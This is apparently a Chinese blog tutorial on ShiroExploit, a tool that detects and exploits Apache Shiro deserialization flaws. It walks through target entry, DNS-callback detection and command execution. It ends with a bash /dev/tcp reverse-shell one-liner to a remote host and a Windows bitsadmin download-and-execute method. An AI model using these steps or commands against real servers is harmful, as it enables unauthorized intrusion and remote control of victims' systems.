Shiro漏洞工具的使用

文章目录

      • 01 下载ShiroExploit.V2.3,并运行.jar
      • 02 运行后的界面
      • 03输入测试的url
      • 04 选择检测方式
      • 05 判断是否存在漏洞的依据
      • 06 反弹shell

01 下载ShiroExploit.V2.3,并运行.jar

  • 在github上直接搜索下载
  • 有源码,可以自己编译成.jar
    Shiro漏洞工具的使用_第1张图片

02 运行后的界面

  • Shiro550无需选择操作系统类型,
  • Shiro721需要选择操作系统类型
  • 复杂Http请求支持直接粘贴数据包

Shiro漏洞工具的使用_第2张图片

03输入测试的url

  • 可以自己直接输入被检测是否存在shire反序列漏洞的地址

Shiro漏洞工具的使用_第3张图片

04 选择检测方式

  • CEYE.IO
可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 
  • dnslog.cn
 可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload 
缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录

Shiro漏洞工具的使用_第4张图片

05 判断是否存在漏洞的依据

  • 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入
  • 当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令

Shiro漏洞工具的使用_第5张图片
Shiro漏洞工具的使用_第6张图片

06 反弹shell

  • 反弹shell(linux)采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1的方式反弹 shell
  • 反弹shell(Windows)采用 bitsadmin下载指定 URL 的 exe 文件并执行的方式获取 shell
  • 如果反弹shell无法成功,可能自己的阿里云主机的端口未开放
    Shiro漏洞工具的使用_第7张图片

参考链接:https://github.com/feihong-cs/ShiroExploit

你可能感兴趣的:(网络工具使用)